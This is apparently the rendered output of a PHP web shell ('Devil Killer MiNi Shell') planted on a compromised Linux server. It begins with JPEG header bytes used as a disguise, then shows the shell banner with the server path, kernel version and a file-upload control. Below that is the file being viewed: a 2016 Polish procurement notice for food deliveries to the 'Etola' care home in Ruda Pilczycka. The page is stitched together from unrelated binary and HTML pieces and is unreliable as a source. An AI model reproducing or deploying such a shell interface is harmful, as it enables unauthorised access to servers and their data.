JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161115/342823-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.konecki.wrota-swietokrzyskie.pl/web/guest/dps_ruda_pilczycka_zamowienia_publiczne' target='_blank'>http://bip.konecki.wrota-swietokrzyskie.pl/web/guest/dps_ruda_pilczycka_zamowienia_publiczne</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 342823 - 2016
              z dnia 2016-11-15 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Ruda Pilczycka: Dostawa art. żywnościowych do Domu Pomocy Społecznej ,,Etola" w Rudzie Pilczyckiej (7 części zamówienia)<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Dom Pomocy Społecznej, krajowy numer identyfikacyjny
              29240605200000, ul.
               
              57,
              26234  
              Ruda Pilczycka, woj.
              świętokrzyskie, państwo
              Polska, tel.
              0-41 3912112, e-mail
              , faks
              0-41 3912100.
              <br />
              Adres strony internetowej (URL): http://www.etola.dps.pl/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.konecki.wrota-swietokrzyskie.pl/web/guest/dps_ruda_pilczycka_zamowienia_publiczne</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.konecki.wrota-swietokrzyskie.pl/web/guest/dps_ruda_pilczycka_zamowienia_publiczne</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie, zgodnie z zasadami określonymi w rozdziale XIII  SIWZ<br />
                Adres:
                <br />Dom Pomocy Społecznej ,,Etola", Ruda Pilczycka 57, 26-234 Słupia. Oferty można składać od poniedziałku do piątku w godzinach  od 7.30 d 15.30</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa art. żywnościowych do Domu Pomocy Społecznej ,,Etola" w Rudzie Pilczyckiej (7 części zamówienia)<br /><b>Numer referencyjny: </b>DPS.AG.3411.263.206<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest  dostawa artykułów żywnościowych do Domu Pomocy Społecznej ,,Etola w Rudzie Pilczyckiej zgodnie z opisem  zawartym w rozdziale IV (części zamówienia).Części zamówienia
Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę              na jedną lub wszystkie grupy. Oferta częściowa musi obejmować wszystkie pozycje określone w danej grupie. Oferta częściowa musi obejmować co najmniej jedną z poniższych grup.Grupa I. Pieczywo
Grupa II. Przetwory sypkie, przyprawy, produkty strączkowe, przetwory, napoje
Grupa  III. Drób i przetwory drobiowe
Grupa  IV. Nabiał i przetwory nabiałowe
Grupa  V. Mięso wieprzowe , wędliny i wyroby podrobowe
Grupa VI.  Art. spożywcze mrożone , ryby wędzone i solone
            Grupa VII . Jaja1.1	Przedmiotem zamówienia jest zakup i dostawa artykułów żywnościowych zgodnie              z wykazem   zamieszczonym w grupach I-VII.
1.2	Wykonawca winien dokładnie zapoznać się ze wszystkimi zapisami SIWZ.
1.3	Treść oferty musi odpowiadać treści SIWZ i być zgodna z powszechnie obowiązującymi przepisami prawa. Jeśli w opisie zamówienia  formularz ofertowy- Zamawiający wskazał konkretny znak towarowy produktu,                 to Wykonawca ma możliwość zaoferowania produktu równoważnego i powinien podać nazwę oferowanego produktu równoważnego. Brak takiego zapisu spowoduje uznanie, że Wykonawca oferuje produkt wskazany przez Zamawiającego.
1.4	Wykonawca który powołuje się na rozwiązania równoważne opisane przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy- produkty- spełniają wymagania określone przez Zamawiającego-(art. 30 ust. 5 ustawy PZP). 
1.5	Wymogi dodatkowe:
- artykuły będące przedmiotem zamówienia powinny być pierwszej jakości, posiadać wymagane atesty, etykiety, które winny informować o nazwie i adresie producenta, składzie produktu i dacie ważności, być odpowiednio opakowane i transportowane w warunkach spełniających wszystkie wymogi sanitarne,
-dostawa na koszt i ryzyko transportem Wykonawcy do magazynu Zamawiającego,
- dostawy częściowe, sukcesywne, uruchamiane telefonicznie,
-zmiana cen w trakcie realizacji umowy może nastąpić tylko na skutek okoliczności których nie można było  przewidzieć w chwili jej zawarcia, 
1.6	 Ilości podane w grupach I- VII są szacunkowe i mogą ulec zmianie (zmniejszeniu lub zwiększeniu nie więcej niż o 20%). Z tego tytułu wykonawcy nie będą przysługiwały żadne roszczenia wobec zamawiającego.


Grupa I    Pieczywo
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Chleb żytni krojony                                       1 kg	szt.	7 000
2.		Chleb razowy krojony                                   1 kg	szt.	5 000
3.		Bułka wrocławska                                       100 g	szt.	25 000
4.		Bułka razowa                                               100 g	szt.	4 000

Grupa II     Przetwory sypkie, przyprawy, produkty strączkowe, 
przetwory, napoje
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Ananas plastry                                                     565 g	szt.	100
2.		Aromaty do ciast                                                   10 g	szt.	100
3.		Barszcz czerwony (koncentrat)                      320 ml	szt. 	60
4.		Bazylia                                                                     10 g	szt.	45
5.		Brzoskwinie w syropie                                        820 g	szt.	55
6.		Budyń różne smaki Winiary                           60-64 g	szt.	1 000
7.		Bułka tarta                                                             1  kg	kg	130
8.		Chrzan tarty                                                         290 g	szt.	350
9.		Ciastka biszkopty Wrocławskie Mamut          120 g	szt.	50
10.		Cukier kryształ                                                        1 kg	kg	2 400
11.		Cukier waniliowy                                                   32 g	szt.	250
12.		Cynamon                                                                 20 g	szt.	50
13.		Drożdże świeże                                                    100 g	szt.	130
14.		Dżem owocowy (różne smaki) Pińczów          280 g	szt.	600
15.		Dżem bezcukrowy (różne smaki)  Stovit         220 g	szt.	100
16.		Fasola czerwona konserwowa                          400 g	szt.	110
17.		Fasola Jaś                                                                1 kg	kg	150
18.		Filety śledziowe w oleju                                     170 g	szt.	350
19.		Filety śledziowe w pomidorach                        170 g	szt.	400
20.		Galaretka owocowa   Delecta                             75 g	szt.	600
21.		Gałka muszkatołowa                                             15 g	szt.	25
22.		Groch łuskany                                                         1 kg	kg	160
23.		Groszek konserwowy                                         400 g	szt.	450
24.		Herbata                                                                   1 kg	kg	85
25.		Herbata owocowa Saga (op. 25 torebek)	op.	50
26.		Imbir mielony                                                         20 g	szt.	25
27.		Kakao                                                                     200 g	szt.	50
28.		Kasza gryczana                                                       1 kg	kg	80
29.		Kasza jęczmienna                                                  1 kg	kg	280
30.		Kasza kukurydziana                                               1 kg	kg	70
31.		Kasza manna                                                          1 kg	kg	90
32.		Kaszka mleczno -ryżowa truskawkowa Nestle                     230g 	szt.	10
33.		Kawa zbożowa                                                     500 g	szt.	60
34.		Ketchup łagodny                                                 500 g	szt.	250
35.		Kisiel różne smaki Winiary                                  77 g	szt.	1 300
36.		Kminek                                                                    20 g	szt.	70
37.		Koncentrat pomidorowy 30%   Pińczów         950 g	szt.	180
38.		Konserwa mięsna  
Przysmak Śniadaniowy                                       300 g	szt.	700
39.		Koperek suszony                                                    10 g	szt.	100
40.		Kostki rosołowe drobiowe  Winiary                   60 g	szt.	150
41.		Kostki rosołowe wołowe Winiary                       60 g	szt.	200
42.		Krem do smarowania pieczywa o smaku czekoladowym                                                     200 g	szt.	100
43.		Krem do smarowania pieczywa o smaku orzechowym                                                        200 g	szt.	70
44.		Kukurydza konserwowa                                     400 g	szt.	160
45.		Kwasek cytrynowy                                                 20 g	szt.	100
46.		Liść laurowy                                                              7 g	szt.	150
47.		Majeranek                                                                 8 g	szt.	150
48.		Majonez Kielecki                                                 500 g	szt.	400
49.		Makaron nitki Lubella                                           2 kg	kg	400
50.		Makaron łazanki                                                    2 kg	kg	130
51.		Makaron muszelki                                                 2 kg	kg	170
52.		Makaron spaghetti Lubella                                  1 kg	kg	80
53.		Makaron świderki                                                  2 kg	kg	500
54.		Margaryna śniadaniowa Bielmar                     500 g	kg	600
55.		Margaryna zwykła                                               250 g	kg	125
56.		Marmolada Duchnice                                         850 g	szt.	130
57.		Marynata klasyczna Prymat                                20 g	szt.	120
58.		Marynata staropolska  Kamis                              20 g	szt.	100
59.		Masło roślinne  kubek Kruszwica                     250 g	kg	380
60.		Mąka pszenna typ 500                                         1 kg	kg	650
61.		Mąka ziemniaczana                                               1 kg	kg	20
62.		Mąka żytnia typ 500                                              1 kg	kg	130
63.		Miód pszczeli  wielokwiatowy                          370 g	szt.	120
64.		Mlekołaki kulki, kółka kakaowe                       250 g	szt.	20
65.		Morele suszone                                                   150 g	szt.	10
66.		Musztarda   stołowa                                           190 g	szt.	400
67.		Ocet                                                                         0,5 l	szt.	20
68.		Ogórki konserwowe                                            850 g	szt.	270
69.		Olej uniwersalny                                                       3 l                                 	l	400
70.		Oregano                                                                  10 g	Szt.	50
71.		Papryka konserwowa                                         780 g	szt.	60
72.		Papryka ostra                                                         20 g	szt.	100
73.		Papryka słodka                                                       20 g	szt.	150
74.		Pasztet drobiowy  Podlaski                                155 g                                              	szt.	1 100
75.		Pasztet Mazowiecki                                            460 g	szt.	370
76.		Pieczarki marynowane                                       770 g	szt.	100
77.		Pieprz naturalny mielony                                     20 g	szt.	600
78.		Pieprz ziołowy                                                        20 g	szt.	550
79.		Pietruszka suszona                                                10 g                                   	szt.	110
80.		Płatki jęczmienne                                                  1 kg	kg	50
81.		Płatki kukurydziane                                               1 kg	kg	30
82.		Płatki owsiane                                                        1 kg	kg	50
83.		Pomidory obierane                                             400 g	szt.	400
84.		Powidła węgierkowe                                          280 g	szt.	250
85.		Proszek do pieczenia                                            30 g	szt.	60
86.		Przyprawa do drobiu Cykoria                              40 g	szt.	135
87.		Przyprawa do ryb Cykoria                                    40 g	szt.	70
88.		Przyprawa do ziemniaków  Cykoria                   30 g	szt.	70
89.		Przyprawa  Warzywko                                          1 kg	kg	60
90.		Przyprawa w płynie  Maggi                                     1 l	l	120
91.		Rodzynki                                                               100 g	szt.	120
92.		Ryż długoziarnisty biały                                       1 kg	kg	450
93.		Sałatka rybna                                                        150g	szt.	1 000
94.		Sok pomidorowy  Hortex                                       1 l	szt.	30
95.		Słodzik                                                     op. 1000 szt.	op.	5
96.		Sól jodowana                                                          1 kg	kg	500
97.		Suchary delikatesowe Mamut                          285 g 	szt.	10
98.		Syrop owocowy Łowicz różne smaki              440ml	szt.	320
99.		Szczaw konserwowy                                           285 g	szt.	80
100.		Szprot w oleju                                                      170 g	szt.	450
101.		Szprot w pomidorach                                         170 g	szt.	280
102.		Szynka konserwowa mielona  Werbliński       110 g	szt.	1 250
103.		Śliwki suszone bez pestki                                   150 g	szt.	50
104.		Tuńczyk w oleju                                                   170 g	szt.	750
105.		Wiórki kokosowe                                                 100 g	szt.	50
106.		Woda mineralna gazowana                                 1,5 l	szt.	900
107.		Woda mineralna niegazowana                           1,5 l	szt.	120
108.		Zacierki                                                                    1 kg	kg	150
109.		Ziele angielskie                                                       15 g	szt.	150
110.		Zioła prowansalskie                                              10 g	szt.	50
111.		Zupa grzybowa Winiary                                        48 g	szt.	400
112.		Zupa pieczarkowa Winiary                                   45 g	szt.	450
113.		Zupa ogonowa Winiary                                        41 g	szt.	220
114.		Żelatyna spożywcza                                              40 g 	szt.	60
115.		Soda oczyszczona                                                100 g	szt.	5
116.		Mak	kg	10
117.		Susz wigilijny 	kg	5


Grupa III  Drób i przetwory drobiowe
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Kurczak schłodzony	kg	550
2.		Korpusy z kurczaka	kg	550
3.		Filet z kurczaka	kg	550
4.		Ćwiartki  z kurczaka	kg	800
5.		Wątróbka drobiowa	kg	180
6.		Żołądki z kurczaka	kg	210
7.		Mięso drobiowe gulaszowe II	kg	400


Grupa IV       Nabiał i przetwory nabiałowe
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Mleko w proszku odtłuszczone	kg	700
2.		Twaróg  półtłusty 	kg	550
3.		Masło extra   82% tłuszczu                       200 g                           	kg	220
4.		Ser żółty  Gouda	kg	250
5.		Jogurt owocowy                                         150 g	szt.	5 300
6.		Jogurt naturalny                                         450 g	szt.	1 500
7.		Serek topiony   krem. op.                          100 g	szt.	2 100
8.		Serki homogenizowane waniliowe          100 g	szt.	950
9.		Kefir  kubek                                                  450 g	szt.	2 100
10.		Śmietana  24 %  kubek                            400 ml	szt.	1 000
11.		Śmietana 12%  karton       poj.               500 ml	szt.	350

Grupa V         Mięso wieprzowe , wędliny  i wyroby podrobowe
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Żeberka wieprzowe	kg	320
2.		Boczek surowy wieprzowy bez skóry 	kg	100
3.		Schab  wieprzowy bez kości 	kg	280
4.		Szynka wieprzowa bez kości i bez skóry	kg	310
5.		Łopatka wieprzowa bez kości i bez skóry	kg	400
6.		Słonina wieprzowa bez skóry	kg	150
7.		Podroby wieprzowe bez wątroby	kg	150
8.		Podgardle wieprzowe	kg	20
9.		Głowizna wieprzowa	kg	170
10.		Mięso wieprzowe II 	kg	400
11.		Karczek wieprzowy bez kości	kg	180
12.		Kiełbasa szynkowa wieprzowa	kg	150
13.		Kiełbasa  mielonka tyrolska	kg	310
14.		Mortadela bez dodatków	kg	310
15.		Kiełbasa cienka zwyczajna wędzona	kg	800
16.		Parówki  wieprzowe	kg	300
17.		Parówki drobiowe	kg	250
18.		Kiełbasa  krakowska parzona	kg	250
19.		Kiełbasa biała żurkowa	kg	300
20.		Szynka wędzona	kg	15
21.		Ogonówka wieprzowa wędzona 	kg	25
22.		Boczek wędzony	kg	150
23.		Pasztet pieczony wieprzowy	kg	160
24.		Salceson  włoski	kg	230
25.		Salceson  czarny	kg	70
26.		Pasztetowa wieprzowa	kg	180
27.		Kaszanka jęczmienna	kg	250
28.		Kiełbasa szynkowa drobiowa	kg	180


Grupa VI        Art. spożywcze mrożone, ryby wędzone i solone
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Fasolka szparagowa mrożona                  450 g	szt.	800
2.		Mieszanka kompotowa mrożona                          	kg	500
3.		Mieszanka warzywna mrożona 	kg	350
4.		Filet mrożony z miruny	kg	600
5.		Filety śledziowe bez skóry solone	kg	60
6.		Makrela wędzona bez głowy	kg	50



Grupa VII         Jaja
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Jaja 50-60 g	szt.	22 000

Grupa I. Pieczywo  codziennie oprócz niedziel i dni świątecznych - w godz. 600-630
Grupa II. Przetwory sypkie,  przyprawy, produkty strączkowe ,przetwory, napoje                 1 raz w  tygodniu  w godz. 800 -1400 ( od poniedziałku do czwartku)
Grupa III. Drób i przetwory drobiowe  4 razy w miesiącu  w godz. 800 -1400 (oprócz piątków)
Grupa IV. Nabiał i przetwory nabiałowe  1 raz w tygodniu  w godz. 800 -1400 (oprócz piątków)
Grupa V. Mięso wieprzowe , wędliny i wyroby podrobowe  3 razy w tygodniu  w godz. 800 -1400
Grupa VI. Art. spożywcze mrożone , ryby wędzone i solone  1 raz w tygodniu - w godz. 800 -1400 (oprócz piątków)
Grupa VII. Jaja - 1 raz w tygodniu - w godz. 800 -1400 (oprócz piątków)


<br /><br /><b>II.5) Główny kod CPV: </b>15000000-8<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 02/01/2017
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
